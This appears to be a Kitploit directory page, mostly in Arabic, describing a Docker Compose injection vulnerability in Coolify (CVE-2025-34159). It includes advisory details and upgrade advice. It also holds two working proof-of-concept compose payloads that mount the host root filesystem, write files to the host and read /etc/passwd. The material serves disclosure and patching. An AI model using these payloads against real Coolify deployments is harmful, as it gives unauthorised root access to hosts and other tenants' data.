Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-34159 — A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on | Kitploit
أدوات/GitHubGitHub/eyodav/cve-2025-34159
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityMisconfigurationRed Teaming
GitHubeyodav/cve-2025-34159

CVE-2025-34159

عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on

مشاركة

CVE-2025-34159: حقن Docker Compose في Coolify

نظرة عامة على الثغرة

الحقلالقيمة
معرف CVECVE-2025-34159
يؤثر علىCoolify ≤ v4.0.0-beta.420.6
تم الإصلاح فيv4.0.0-beta.420.7
الخطورةحرجة
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (حقن أوامر النظام), CWE-20 (التحقق غير السليم من المدخلات)

ملخص تنفيذي

توجد ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في سير عمل نشر التطبيقات في Coolify. تسمح هذه الثغرة لـ عضو ذي صلاحيات منخفضة بحقن توجيهات Docker Compose تعسفية أثناء إنشاء المشاريع أو تحديثها. من خلال تعريف خدمة خبيثة تقوم بتحميل نظام الملفات للمضيف، يمكن للمهاجم تحقيق تنفيذ أوامر على مستوى الجذر على نظام التشغيل المضيف، متجاوزًا بذلك عزل الحاويات تمامًا.


الأثر الأمني

  • تنفيذ أوامر تعسفي على النظام المضيف بصلاحيات الجذر
  • اختراق كامل للمضيف بما في ذلك القدرة على قراءة/كتابة ملفات النظام، وإنشاء استمرارية، وتنفيذ حركة جانبية
  • خرق أمني متعدد المستأجرين قد يعرض المستخدمين والفرق الأخرى على نفس المثيل للخطر
  • تجاوز الضوابط الأمنية مما يجعل قيود الوصول إلى المحطة الطرفية في الواجهة (ضوابط 403) غير ذات صلة

تفاصيل تقنية

الإصدارات المتأثرة

  • الإصدارات المتأثرة: Coolify ≤ v4.0.0-beta.420.6
  • الإصدار المصحح: v4.0.0-beta.420.7

ناقل الهجوم

توجد الثغرة في سير عمل نشر المشروع حيث يتم معالجة تكوينات Docker Compose المقدمة من المستخدم دون التحقق الكافي أو وضعها في بيئة معزولة.


إثبات المفهوم

إثبات المفهوم 1: تحميل جذر المضيف مع تنفيذ الأوامر

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

النتيجة: بعد النشر، يظهر الملف /tmp/proof_rce.txt على النظام المضيف، مما يؤكد RCE بصلاحيات الجذر.

إثبات المفهوم 2: كتابة مسار مضيف مستهدف

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

خطوات إعادة الإنتاج

  1. تسجيل الدخول كمستخدم على مستوى عضو (غير مسؤول)
  2. إنشاء أو تعديل مشروع في Coolify
  3. توفير تكوين خبيث باستخدام أحد حمولات Docker Compose أعلاه
  4. نشر المشروع
  5. التحقق من الاستغلال من خلال البحث عن آثار جانبية على المضيف (مثل /tmp/proof_rce.txt) أو مراجعة مخرجات الأوامر في سجلات النشر

إجراءات فورية

  1. الترقية فورًا إلى Coolify v4.0.0-beta.420.7 أو أحدث
  2. مراجعة المشاريع الحالية بحثًا عن تكوينات Docker Compose يحتمل أن تكون خبيثة

المراجع

  • ملاحظات التصحيح/الإصدار: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • مستودع الاستشارة/إثبات المفهوم: https://github.com/Eyodav/CVE-2025-34159
تنزيل الأداة